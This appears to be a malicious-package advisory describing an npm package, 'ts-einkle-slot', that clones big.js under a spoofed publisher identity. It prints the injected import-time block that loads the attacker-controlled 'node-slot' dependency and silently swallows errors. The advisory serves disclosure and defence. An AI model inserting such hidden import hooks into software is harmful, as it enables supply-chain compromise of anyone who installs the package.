MAL-2026-6525

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b) Package is published as `ts-einkle-slot` but its tarball contents (source, README, LICENCE, package.json author/repository/description) are copied verbatim from Michael Mclaughlin's legitimate `big.js` package, presenting a spoofed publisher identity. The CommonJS and ESM entrypoints (`big.js` and `big.mjs`, referenced from `main`/`module`/`exports`) contain an injected top-level block: `try { const doc = require('node-slot'); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {}`. This causes the transitive dependency `node-slot` (pulled in via the declared `ts-einkle` dependency) to be loaded and its `from_str()` invoked the moment any consumer `require`s or `import`s this package, with errors silently swallowed so the host package keeps functioning as a drop-in big.js replacement. The package's advertised purpose is decimal arithmetic; there is no legitimate reason to load an unrelated `node-slot` runtime module on import. Installer harm is delivered by the attacker-controlled transitive `node-slot`, which is pulled into the install tree solely by virtue of installing this package.